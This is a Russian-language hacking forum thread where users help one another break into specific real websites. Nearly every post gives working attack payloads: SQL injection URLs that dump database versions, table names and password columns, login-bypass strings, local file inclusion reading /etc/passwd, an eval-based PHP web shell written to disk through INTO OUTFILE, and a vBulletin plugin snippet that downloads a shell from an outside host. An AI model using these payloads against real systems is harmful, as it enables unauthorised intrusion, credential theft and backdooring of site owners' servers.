'and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),( select(null)from(information_schema.columns)where( table_schema!=0x696e666f726d6174696f6e5f736368656d 61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name))))x),10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#

Как на сайте посмотреть содержимое директории?

http://www.enu.dk/index.php?index=http://site.com/shell.php?c=ls%20-al

команда не выполняется

allow_url_fopen - on

http://www.enu.dk/index.php?index=../phpinfo.php

er9j6@ said:
Как на сайте посмотреть содержимое директории?
http://www.enu.dk/index.php?index=http://site.com/shell.php?c=ls%20-al

команда не выполняется
allow_url_fopen - on
http://www.enu.dk/index.php?index=../phpinfo.php




Code:
include(includes/

Facepalm.

Это LFI, а не RFI. Local File Include.

http://www.enu.dk/index.php?index=../../../../etc/passwd

Дальше либо чекай /proc/self/environ/

/proc/self/fd/2 (вообще от 1 до 7)

Или ищи access логи. И заходи на страницу с юзерагентом по типу

В курле параметр -H

-H "User-Agent: "

Что неправильно делаю? file_priv=y


Code:
http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat( (select(0x2533433F7068702532306576616C28245F524551 554553545B636D645D293B25)/**/from/**/fontan.mp_gw_auth/**/into/**/outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E 72752F7368656C6C),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'

z0mbie86 said:
Что неправильно делаю? file_priv=y

Code:
http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat( (select(0x2533433F7068702532306576616C28245F524551 554553545B636D645D293B25)/**/from/**/fontan.mp_gw_auth/**/into/**/outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E 72752F7368656C6C),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'





Code:
outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E 72752F7368656C6C)

Хекс не прокатит с OUTFILE.

Есть вариант со встроенными запросами.

=Zeus= said:
Добрый вечер. Интересует, что можно сделать с этим сайтом. Проблема в том что я нашел лишь одну php-страничку. Даже кавычку подставить некуда. Не понятно так же, что за движок (походу самописный). Сканил структуру сайта меднет-сканнером - тоже ничего интересного.
Все что я смог это получить раскрытие путей, подпортив кукисы.
Буду благодарен за любую инфу, которая может помочь.


Ну, судя по страничке, там в коде выполняется print_r($_REQUEST);

XSS:

http://marafet.net/include/ajax/modules/gallery/voteImage.php?a=%3Cscript%3Ealert(1)%3C/script%3E

Boolean said:
Ну, судя по страничке, там в коде выполняется print_r($_REQUEST);
XSS:
http://marafet.net/include/ajax/modules/gallery/voteImage.php?a=%3Cscript%3Ealert(1)%3C/script%3E


Спасибо большое, на крайняк хоть кукисы утяну.

почистил по просьбе.

Версию и юзера вывел

http://protein.7910.org/product_info.php/products_id/125'and(select*from(select(name_const(concat_ws(0x 3a,version(),user()),1)),name_const(concat_ws(0x3a ,version(),user()),1))a)and'

Как щас вывести таблицы из information_schema.tables, какой должен быть запрос?

er9j6@ said:
Версию и юзера вывел
http://protein.7910.org/product_info.php/products_id/125'and(select*from(select(name_const(concat_ws(0x 3a,version(),user()),1)),name_const(concat_ws(0x3a ,version(),user()),1))a)and'
Как щас вывести таблицы из information_schema.tables, какой должен быть запрос?


Зачем пытаться проводить инъекцию как в Insert запросах, тем самым усложняя себе жизнь?

Что мешало сделать просто вот так:

http://protein.7910.org/product_info.php/products_id/126'%20and%201=3%20union%20select%201,2,3,4,concat _ws(0x3a,version(),database(),user()),6,7,8,9,10,1 1,12,13,14,15,16%20--%20

?)

есть ли способ выполнить не sql запрос а php код внутри кавычек

к примеру такой вариант


PHP:




создаеться файл TEST.PHP с профильтрованным содержимым id

ysmat said:
есть ли способ выполнить не sql запрос а php код внутри кавычек
к примеру такой вариант

PHP:




создаеться файл TEST.PHP с профильтрованным содержимым id


да возможно, так как функция addslashes(); добовляет слешь к ковычкам, а в пхп элементарно даже можно выполнить , вопрос следущий, куда здесь добавиться слешь))

winstrool said:
да возможно, так как функция addslashes(); добовляет слешь к ковычкам, а в пхп элементарно даже можно выполнить , вопрос следущий, куда здесь добавиться слешь))


Вообще-то как-такового варианта обхода нет.

Boolean said:
Вообще-то как-такового варианта обхода нет.


то есть выполнить php код не получиться

а вариант с мультибайтовыми кодировками ?

Boolean said:
Вообще-то как-такового варианта обхода нет.


Тока что проверял у себя на локал хосте скрипт, если пораметру id присвоить значение, к примеру "", то в файл TEST.PHP, записывается такая информация "log = ''", следовательно так как сам фаел имеет расширение php и в самом нем прописывается теги на выполнение пхп он и выполняется, попробуй у себя протестировать и все поймешь, у себя на локалхосте я делал так:


test1.ru/1.php?ID=%3C?%20phpinfo();%20?%3E


P.S.: вот намерено вставил в код кавычку и вот что получилось в файле


log = ''

winstrool said:
Тока что проверял у себя на локал хосте скрипт, если пораметру id присвоить значение, к примеру "", то в файл TEST.PHP, записывается такая информация "log = ''", следовательно так как сам фаел имеет расширение php и в самом нем прописывается теги на выполнение пхп он и выполняется, попробуй у себя протестировать и все поймешь, у себя на локалхосте я делал так:
P.S.: вот намерено вставил в код кавычку и вот что получилось в файле


а, понял о чем, видимо файл юзается как файл настроек.

т.е. начало идет прямо с log=' ?)

Если да, то круто.

Boolean said:
а, понял о чем, видимо файл юзается как файл настроек.
т.е. начало идет прямо с log=' ?)
Если да, то круто.


да файл используеться как хранилище настроек но в виде php массива

и увы теги php находяться в начале файла и недоступны

надежда была только на то что в php есть и другие символы короме кавычки и слеша имеющие особые свойства

ysmat said:
да файл используеться как хранилище настроек но в виде php массива
и увы теги php находяться в начале файла и недоступны
надежда была только на то что в php есть и другие символы короме кавычки и слеша имеющие особые свойства


просто записываешь это

.php?ID= и все

попугай said:
просто записываешь это
.php?ID= и все


И что выйдет из этого? Значение переменной ID попадут в одинарную кавычку, и PHP интерпретатор будет считать это обычным текстом, а не php кодом.

Expl0ited said:
И что выйдет из этого? Значение переменной ID попадут в одинарную кавычку, и PHP интерпретатор будет считать это обычным текстом, а не php кодом.


Посмотри код внимательнее, параметр w при открытии файла - соответственно весь файл будет очищен, и создаться файл с текстом:

TEST.PHP:


PHP:
log = ''

Ну и открываем файл TEST.PHP в браузере.

Очень интересует что происходит в данном случае?

WebCruiser`ом сливаю базу, а она, как видно на скрине идет какими-то закорючками)

http://s2.ipicture.ru/uploads/20111023/6V2NO4S4.jpg

народ помогите разкрутить скулю, не мойму как дальше

http://www.lcoastpress.com/journal.php?id=7'

qaz said:
народ помогите разкрутить скулю, не мойму как дальше
http://www.lcoastpress.com/journal.php?id=7'


http://www.lcoastpress.com/journal.php?id=7+or+1+group+by+concat((select+vers ion()),floor(rand(0)*2))having+min(0)+or+1--+

Konqi said:
http://www.lcoastpress.com/journal.php?id=7+or+1+group+by+concat((select+vers ion()),floor(rand(0)*2))having+min(0)+or+1--+


я понимаю значение етих команд, но не понимаю как и почему такое их скопление работает , хто может обьяснить или где я могу почитать?

qaz said:
я понимаю значение етих команд, но не понимаю как и почему такое их скопление работает
, хто может обьяснить или где я могу почитать?


/threadnav119047-1-10.html

всем ку)

http://www.uralremstroy.ru/catalog.php?group_id=104

с простыми эксплуатациями sql inj знаком, но как тут вывести кол-во полей ни как не пойму или там вообще нельзя вывести?

Заранее спасибо.

Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:


PHP:
SELECT '' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;

=Zeus= said:
Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:

PHP:
SELECT '' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;



select '' into outfile '/path_to_web/maybe_some_dir/shell.php'. Такого файла не должно существовать, должны быть права на запись в папку. После идёшь http://site.com/maybe_some_dir/shell.php?q=wget http://yoursite.com/shell.txt -O s.php

-O s.php - переименование. Это если система линуховая и ты не можешь сделать так, чтобы .php не обрабатывался на твоём сайте. Можешь просто форму аплоада сделать со скриптом залива файла (шелла основного).

upd. "e" - двойные кавычки, чот форум одинарные ставит.

upd. если тебе надо узнать путь, то ищи(сканеры директорий и файлов в помощь) файл с phpinfo(), оч часто на сайтах лежат. Либо пробуй вызвать ошибку скрипта, и если включён их показ - увидишь путь.

Melfis said:
select '' into outfile '/path_to_web/maybe_some_dir/shell.php'. Такого файла не должно существовать, должны быть права на запись в папку. После идёшь http://site.com/maybe_some_dir/shell.php?q=wget http://yoursite.com/shell.txt -O s.php
-O s.php - переименование. Это если система линуховая и ты не можешь сделать так, чтобы .php не обрабатывался на твоём сайте. Можешь просто форму аплоада сделать со скриптом залива файла (шелла основного).
upd. "e" - двойные кавычки, чот форум одинарные ставит.
upd. если тебе надо узнать путь, то ищи(сканеры директорий и файлов в помощь) файл с phpinfo(), оч часто на сайтах лежат. Либо пробуй вызвать ошибку скрипта, и если включён их показ - увидишь путь.




Code:
''

Ошибка же.

Вот так правильно будет:


Code:
''
или вообще без кавычек
''

Konqi said:
/threadnav119047-1-10.html


чёт я там не нашол нигде ответа

Boolean said:

Code:
''

Ошибка же.
Вот так правильно будет:

Code:
''
или вообще без кавычек
''





upd. "e" - двойные кавычки, чот форум одинарные ставит.


перепутал с q -__-

qaz said:
чёт я там не нашол нигде ответа


http://www.xakep.ru/post/52222/

z0mbie86 said:
Что неправильно я делаю?

Code:
http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(SELECT/**/0x2533433F7068702532306576616C28245F52455554553545 B636D645D293B25/**/INTO/**/OUTFILE/**/'/srv/www/vhosts/217.8.80.55/modules/gw/jindex.php')and'



А там есть вообще sql inj?

http://wifi.hm-ugratel.ru/?m[admin]&id=123

http://wifi.hm-ugratel.ru/?m[admin]&id=abc

http://wifi.hm-ugratel.ru/?m[admin]&id=123'

http://wifi.hm-ugratel.ru/?m[admin]&id=abc'

Разницу чувствуешь? я - нет. Если и есть, то жесть какая слепая.

smirk said:
всем ку)
http://www.uralremstroy.ru/catalog.php?group_id=104
с простыми эксплуатациями sql inj знаком, но как тут вывести кол-во полей ни как не пойму или там вообще нельзя вывести?
Заранее спасибо.


Там 4-ветка, и только блинд

http://www.uralremstroy.ru/catalog.php?group_id=14)+and+substring(version(),1 ,1)=4--+

при сканирование сайта Acunetix Web Vulnerability Scanner 7 есть опасная уезвимость

require valid-user

как я понял это уязвимость связана с http и https при постановки https в нужный запрос получаем сертификат безопасности

как эту уязвимость реализовать?

Не получается раскрутить скуль, при авторизации:

При запросе, т.е. логине


asd
'


, выскакивает ошибка:


MySQL Query fail: SELECT user_pass, user_salt, user_group, user_id FROM `users` WHERE user_name = 'asd
''


При asd' or 1=1--


... WHERE user_name = 'asd' or 1=1--'


Но при asd' or '1=1-- ошибка пропадает, и пишется только что не правильный пароль.

Помогите с запросом, уже с or 1=1 как только мог извращался, не пускает

M1lten said:
Не получается раскрутить скуль, при авторизации:
При запросе, т.е. логине , выскакивает ошибка:
При asd' or 1=1--
Но при asd' or '1=1-- ошибка пропадает, и пишется только что не правильный пароль.
Помогите с запросом, уже с or 1=1 как только мог извращался, не пускает


Действующий ник, например admin' or 1='1

M1lten said:
Не получается раскрутить скуль, при авторизации:
При запросе, т.е. логине , выскакивает ошибка:
При asd' or 1=1--
Но при asd' or '1=1-- ошибка пропадает, и пишется только что не правильный пароль.
Помогите с запросом, уже с or 1=1 как только мог извращался, не пускает


что-то типа этого, но так как там соль, то однозначно сказать нельзя, попробуй тем не менее:

asd' union select 'pass', 'salt', 1, '1

логин указываешь asd

пасс pass

Есть данные для подключения к MSSQL серверу и шелл на серваке, никак не могу подкконектиться к базе, через php не хочет, как я понял нужен asp шелл с поддержкой mssql. поделитесь ктонибудь?

ZARO said:
Есть данные для подключения к MSSQL серверу и шелл на серваке, никак не могу подкконектиться к базе, через php не хочет, как я понял нужен asp шелл с поддержкой mssql. поделитесь ктонибудь?


http://www.plus2net.com/asp-tutorial/db-mssqlconn.php

попробуй из этого сделать простенький шелл

попугай said:
что-то типа этого, но так как там соль, то однозначно сказать нельзя, попробуй тем не менее:
asd' union select 'pass', 'salt', 1, '1
логин указываешь asd
пасс pass


При таком запросе ошибки от мускуля нет, но в ответ я получаю, что пароль не верный.

попугай said:
что-то типа этого, но так как там соль, то однозначно сказать нельзя, попробуй тем не менее:
asd' union select 'pass', 'salt', 1, '1
логин указываешь asd
пасс pass


1' or 1=1 #

И MySQL отдаст всех юзеров, где соблюдается условие 1=1. А соблюдается оно везде.

1' OR 1=1 LIMIT 1 #

Думаю так должно сработать.

Boolean said:
1' or 1=1 #
И MySQL отдаст всех юзеров, где соблюдается условие 1=1. А соблюдается оно везде.
1' OR 1=1 LIMIT 1 #
Думаю так должно сработать.



Тоже, ошибки нет, но пишет что не правильный пароль.

Если что, могу кому-то в пм кинуть

сегодня нашел сайтик:

в mysql.user

два пользователя root с разными хэшами...

как такое возможно? просто 2 пасса у рута?

M1lten said:
Тоже, ошибки нет, но пишет что не правильный пароль.
Если что, могу кому-то в пм кинуть


Ну тогда примерно понятно, чо.

Знач так. Тащемта возмем за основу:

asd' union select 'pass', 'salt', 1, '1

/via кто-то там

Значит там сравнивается с пассом который ты шлешь. да.

Отсылать на скрипт будем пароль: "1"(без кавычек естественно)

думаю что выглядет в коде это как-то так:


PHP:




Наш пароль: 1

"Наша" соль: 2

При авторизации пробуй слать:


Code:
Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), 2)) , 2, 1, 1 --
Пасс: 1

Или


Code:
//md5(md5(pass).md5(salt))
Логин: asd' and 1=2 union select MD5(CONCAT(MD5(1), MD5(2))) , 2, 1, 1 --
Пасс: 1

И так далее по алгоритмам.

Отчет ждем в тему

Boolean, при запросах такова вида, выскакивает ошибка мускуля, а форма авторизации говорит что не верный пароль. И кстати, мб, пароль не шифруется, т.к. он даже в куках передается в открытом виде

M1lten said:
Boolean
, при запросах такова вида, выскакивает ошибка мускуля, а форма авторизации говорит что не верный пароль. И кстати, мб, пароль не шифруется, т.к. он даже в куках передается в открытом виде


ты все варианты засолки то хоть перепробовал как тебе посоветовали?

Тем не менее, дай ссыль чтоль.

Сорри за нубство мужики

Такой вопрос

1,2,..group_concat(login)...

...concat_ws(login)...

не хочет выполнять как можно обойти фильтр?

пробовал

group_concat(CHAR(108,111,103,105,110))

тоже не работает

попугай said:
ты все варианты засолки то хоть перепробовал как тебе посоветовали?
Тем не менее, дай ссыль чтоль.


Вот, при таком запросе нет ошибки мускуля, и скрипт говорит что неверный пароль:

login = asd

pass = 1


asd' and 1=2 union select MD5(CONCAT(MD5(1), MD5(MD5(2)))) , 2, 1, 1 --


И при таком тоже ошибка пропадает и неверный пароль


asd' and 1=2 union select MD5(CONCAT(1, MD5(2))) , 2, 1, 1 --


Если не получится, скину.

crackforme said:
Сорри за нубство мужики
Такой вопрос
1,2,..group_concat(login)...
...concat_ws(login)...
не хочет выполнять как можно обойти фильтр?
пробовал
group_concat(CHAR(108,111,103,105,110))
тоже не работает


http://www.mysql.ru/docs/maryan/#concat_ws

http://webi.ru/webi_articles/8_14_f.html

+ советую к прочтению http://raz0r.name/obzory/group_concat/

site/news.php?id=18 and 1=1 (true)

site/news.php?id=6+AND+ascii(lower(substring(user(),1,1 )))=111 (true)

site/news.php?id=18 and 1=3 (false)

site/news.php?id=18 and 'a'='a'


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''a'='a' LIMIT 0,1' at line 1 в функции view_field select title from news where id=18 and 'a'='a'


в чем суть ошибки? mq вроде бы off

Народ, а чё я делоаю не правильно?

http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+ta ble_name+from+information_schema.tables%29,floor%2 8rand%280%29*2%29%29having+min%280%29+or+1--+

чего мне не показывает таблицы?

qaz said:
Народ, а чё я делоаю не правильно?
http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+ta ble_name+from+information_schema.tables%29,floor%2 8rand%280%29*2%29%29having+min%280%29+or+1--+
чего мне не показывает таблицы?




Code:
http://english.in.ua/study.php?id=7/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)

qaz said:
Народ, а чё я делоаю не правильно?
http://english.in.ua/study.php?id=7+or+1+group+by+concat%28%28select+ta ble_name+from+information_schema.tables%29,floor%2 8rand%280%29*2%29%29having+min%280%29+or+1--+
чего мне не показывает таблицы?


на самом то деле причина просто в


http://english.in.ua/study.php
?id=7+or+1+group+by+concat((select+table_name+from +information_schema.tables
limit 0,1
),floor%28rand(0)*2))having+min(0)+or+1--+




vaddd said:
site/news.php?id=18 and 1=1 (true)
site/news.php?id=6+AND+ascii(lower(substring(user(),1,1 )))=111 (true)
site/news.php?id=18 and 1=3 (false)
site/news.php?id=18 and 'a'='a'
в чем суть ошибки? mq вроде бы off


д а какая разница то? Юзай hex формат. А вообще можешь кинуть линк в пм, если просто интересно.

To, M1lten

Может банально идёт сверка $_REQUSET['login'] == $sql_resp['login']

$_REQUSET['login'] = sdf' sqlinj, а $sql_resp['login'] = выводимое тобою значение. Залогиниться возможно, когда идёт проверка на кол-во строк, которое вернулось после ввода. Может вообще два запроса на проверку логина и пароля, д дофига чего может быть и скуль не провести. Если ошибка от мускуля, то юзай error-based sqlinj

=Zeus= said:
Добрый вечер. Пытаюсь научиться скуль-инжектингу. Много читал, раскрутил скулю, все идеально, file_priv Y. Могу прочитать etc/passwd через load_file(). Как теперь залить минишелл? Ведь нужно знать полный путь, чтоб выполнить например такой код:

PHP:
SELECT '' into dumpfile '/var/lib/mysql/shell.php' from mysql.user;



1.from mysql.userидёт до into dumpfile. Далее может идти только комментарий.

Либо ищем раскрытие путей на сайте, либо читаем через load_file каталоги и ищем полный путь к сайту, хотя возможно прав на папки не бует.

В этом случае Можно будет попробовать посмотреть директории, которые могут быть выведены с сервера, но находящийся в этом каталоге и доп. Файлы, которые можно прочитать или создать нужный файл


crackforme said:
Сорри за нубство мужики
Такой вопрос
1,2,..group_concat(login)...
...concat_ws(login)...
не хочет выполнять как можно обойти фильтр?
пробовал
group_concat(CHAR(108,111,103,105,110))
тоже не работает


А разве это нужные функции, при раскрутке SQL-inj? Если фильтр идёт на них можно будет обойтись и без их использования.

Есть доступ в phpmyadmin

Версия MySQL 5.5.9 как залить шелл?

Какие запросы?

aydin-ka said:
Есть доступ в phpmyadmin
Версия MySQL 5.5.9 как залить шелл?
Какие запросы?


select '' into outfile 'абсолютный_путь_до_папки_с_ правами_на_запись/shell.php'

Подскажите почему не выводит названия таблиц

http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,table_name,4,5+from+informat ion_schema.tables%27

qaz said:
Подскажите почему не выводит названия таблиц
http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,table_name,4,5+from+informat ion_schema.tables%27


http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,unhex(hex(table_name)),4,5+fro m+information_schema.tables--+

Konqi said:
http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,unhex(hex(table_name)),4,5+fro m+information_schema.tables--+


да и без hex и anhex все норм выводит...

http://goldsauna.ru/articles.html?id=-7'+union+select+1,2,table_name,4,5+from+informatio n_schema.tables--+

Народ, а как ваше можно найти полный путь к файлу на хостинге?

qaz said:
Народ, а как ваше можно найти полный путь к файлу на хостинге?


/showthread.php?t=30632

http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1 можно ли раскрутить sql in?Если да то как?

root47 said:
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1 можно ли раскрутить sql in?Если да то как?


Конечно, можно !!!

Но вывода я не нашёл. Так что крутил как Blind SQL.

Там 5 ветка, так что тебе повезло.


Code:
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+substring((version()),1,1)=5

Выдирай посимвольно через ASCII например вот так:


Code:
http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+ascii(substring((version()),1,1))=5 3

http://cod.gamepolis.ru/xlrstats/index.php?func=player&playerid=1+and+ascii(substring((version()),2,1))=4 6

Часть данных:


PHP:
Current User:cod4@95.154.113.66

Sql Version:5.1.58

Current DB:cod4

Спасибо , ликани сыль на Blind SQL

root47 said:
Спасибо , ликани сыль на Blind SQL


Вот неплохая статья

тыц (https://antichat.live/threads/119047/)

Ребят, вопрос...

Заливка шелла на воблу через плагины. (ajax_complete)

Код:


PHP:
$linky="http://site.com/blabla/name.txt";

$saved="./ololo.php";

$from=fopen("$linky","r");

$to=fopen("$saved","w");

while(!feof($from)){

$string=fgets($from,4096);

fputs($to,$string);

}

fclose($to);

echo'done';

fclose($from);

При заходе на site.com/forum/ajax.php

выбивает:


Code:
Warning: fopen(./ololo.php) [function.fopen]: failed to open stream: Permission denied in [path]/ajax.php(1279) : eval()'d code on line 4

Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7

Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7

Warning: fputs(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 7

[куча таких же строчек]

Warning: fclose(): supplied argument is not a valid stream resource in [path]/ajax.php(1279) : eval()'d code on line 9
done

Вопрос заключается в том, как же это исправить, либо, есть ли какая альтернатива?

Permission denied in [path]/ajax.php(1279)


Нет прав на запись в эту папку для этого скрипта. Ищи ту, в которую можно залить (зачастую с картинками, css, js)

Вариант. Но ведь если невкакую не хочет. Все плагины перепробовал и везде ошибка. Как быть?

Fooog said:
Вариант. Но ведь если невкакую не хочет. Все плагины перепробовал и везде ошибка. Как быть?


Искать папку с правами на запись. Вроде бы это очевидно.

Посмотри куда заливаются аватарки на форуме, если не в БД сэйвятся, то лей в ту же директорию и шелл.

Fooog said:
Вариант. Но ведь если невкакую не хочет. Все плагины перепробовал и везде ошибка. Как быть?


Плагины тут не причём. Это нормальные настройки на сервере на всю папку. Ищи те, что я сказал, у некоторых цмс есть свои темповые папки или папки под кэш, в них должно залиться(upd: если они конечно юзались, а то так могут и стоять права, при которых ты не сможешь залить)

Насчет папки да. Разобрался.


могут и стоять права, при которых ты не сможешь залить


Да, да. Я и говорю о альтернативе...

пс


куда заливаются аватарки на форуме


на этом форуме и аватарок нету.

Помогите плиз. разобраться с таким выражением, как дальше его раскрутить? (все испробовал дальше не могу продвинуться, как то не стандартно с кавычками...)

-ttp://www.passion.ru/piknik.php/view/(2)union(select(1),version(),3)

Как бы раскрутить..

Всем привет!

В строку поиска ввожу qwe' asd

Получаю такое:

В строке поиска текст меняется на qwe\' asd

Выводится ошибка:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPP' at line 1

Query: select * from `news` where ( (UPPER(`head`) like '%ASD%') and (UPPER(`head`) like '%QWE'%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPPER(`text`) like '%ASD%') and (UPPER(`text`) like '%QWE'%')) and `hide`=1 order by date desc

Можно как-то раскрутить..? сам пробовал, что-то не получается

namez2 said:
Помогите плиз. разобраться с таким выражением, как дальше его раскрутить? (все испробовал дальше не могу продвинуться, как то не стандартно с кавычками...)
-ttp://www.passion.ru/piknik.php/view/(2)union(select(1),version(),3)




http://www.passion.ru/piknik.php/view/(2)union(select(1),(select(group_concat(column_nam e))from(information_schema.columns)where(table_sch ema!=0x696e666f726d6174696f6e5f736368656d61)and(ta ble_name=0x7061735f7573657273)),3)


Ток учти, что group_concat возвращает до 1кb инфы.


IMMORTAL_S said:
Всем привет!
В строку поиска ввожу
qwe' asd
Получаю такое:
В строке поиска текст меняется на
qwe\' asd
Выводится ошибка:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPP' at line 1

Query: select * from `news` where ( (UPPER(`head`) like '%ASD%') and (UPPER(`head`) like '%QWE'%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPPER(`text`) like '%ASD%') and (UPPER(`text`) like '%QWE'%')) and `hide`=1 order by date desc
Можно как-то раскрутить..? сам пробовал, что-то не получается


Видно же где неправильно ты делаешь то.

1') order by XXX--+

и подбираешь кол-во столбцов, меняешь на юнион и вуаля. Или order by XXX--+ меняешь на error-based sql inj

IMMORTAL_S said:
Всем привет!
В строку поиска ввожу
qwe' asd
Получаю такое:
В строке поиска текст меняется на
qwe\' asd
Выводится ошибка:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPP' at line 1

Query: select * from `news` where ( (UPPER(`head`) like '%ASD%') and (UPPER(`head`) like '%QWE'%') or (UPPER(`anot`) like '%ASD%') and (UPPER(`anot`) like '%QWE'%') or (UPPER(`text`) like '%ASD%') and (UPPER(`text`) like '%QWE'%')) and `hide`=1 order by date desc
Можно как-то раскрутить..? сам пробовал, что-то не получается




Code:
asd qwe'))ORDER/*wtf*/BY(10) --



Code:
asd qwe'))UNION(SELECT(1),(2),(3)from(table)) --



Видно же где неправильно ты делаешь то.
1') order by XXX--+
и подбираешь кол-во столбцов, меняешь на юнион и вуаля. Или order by XXX--+ меняешь на error-based sql inj


Очевидно же, что нельзя допускать пробелов, так как идет explode(' ', $some) и после implode.

Такой вопрос, нашол нужную мне колонку

http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,column_name,4,5+from+informa tion_schema.columns+where+table_name=0x7573657273+ limit+2,1--+

хочу вывести

http://goldsauna.ru/articles.html?id=-7+union+select+1,2,passwd,4,5+from+users--+

а нифига не выводит, почему?

Получилось вот так:


Code:
ass'))/**/and/**/1=(select/**/1/**/from(select/**/count(*),concat((select/**/concat_ws(':',user(),version(),database())),floor( Rand(0)*2))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)/**/and/**/(('1%'='1

Всем спасибо!

qaz said:
Такой вопрос, нашол нужную мне колонку
http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,column_name,4,5+from+informa tion_schema.columns+where+table_name=0x7573657273+ limit+2,1--+
хочу вывести
http://goldsauna.ru/articles.html?id=-7+union+select+1,2,passwd,4,5+from+users--+
а нифига не выводит, почему?



http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,passwd,4,5+from+goldsauna.us ers--+



qaz

эти элементарные шаги описаны почти во всех мануалах

Извиняюсь что занимаю у вас время.Возник вопрос.Собсно сформулировал запрос вида


Code:
http://site.com/menu.php?form_id=-33+union+select+1,2,group_concat(column_name)+FROM +INFORMATION_SCHEMA.columns+where+table_name=char( 99,109,115,95,115,121,115,116,101,109,95,117,115,1 01,114,115)--

В браузере выдает


Code:
id,name,login,password,enabled

Дальше пробую


Code:
http://site.com/menu.php?form_id=-33+union+select+1,2,group_concat(id,0x3a,user,0x3a ,pass)+from+cms_system_users--

Но ничего не выводит,собсно как правильно?Спасибо за внимание

mandalina said:
Извиняюсь что занимаю у вас время.Возник вопрос.Собсно сформулировал запрос вида

Code:
http://site.com/menu.php?form_id=-33+union+select+1,2,group_concat(column_name)+FROM +INFORMATION_SCHEMA.columns+where+table_name=char( 99,109,115,95,115,121,115,116,101,109,95,117,115,1 01,114,115)--

В браузере выдает

Code:
id,name,login,password,enabled

Дальше пробую

Code:
http://site.com/menu.php?form_id=-33+union+select+1,2,group_concat(id,0x3a,user,0x3a ,pass)+from+cms_system_users--

Но ничего не выводит,собсно как правильно?Спасибо за внимание


count(*)

Konqi said:
http://goldsauna.ru/articles.html?id=-7%27+union+select+1,2,passwd,4,5+from+goldsauna.us ers--+


qaz
эти элементарные шаги описаны почти во всех мануалах


goldsauna - ето я так понимаю название БД, а как его узнать? каким запросом?

qaz said:
goldsauna - ето я так понимаю название БД, а как его узнать? каким запросом?


колонка table_schema

mandalina said:
Дальше пробую

Code:
http://site.com/menu.php?form_id=-33+union+select+1,2,group_concat(id,0x3a,user,0x3a ,pass)+from+cms_system_users--

Но ничего не выводит,собсно как правильно?Спасибо за внимание


попробуй просто concat

Проблема с заливкой шелла на vb.

Всё делаю как надо, ajax.php выдает всё ок, но когда захожу по пути где должен быть шелл, его там не оказывается, а просто открывается главная стр. сайта. либо 404 (зависит от сайта)

Код:


Code:
$linky="http://ololo.com/papka/ld.txt";
$saved="./name.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
echo 'done';
fclose($from);

Возможно проблема в том, что обнаружил в плагинах кого то до меня.

2 плагина с такими кодами:


Code:
eval($_REQUEST[cmd123]);

и


Code:
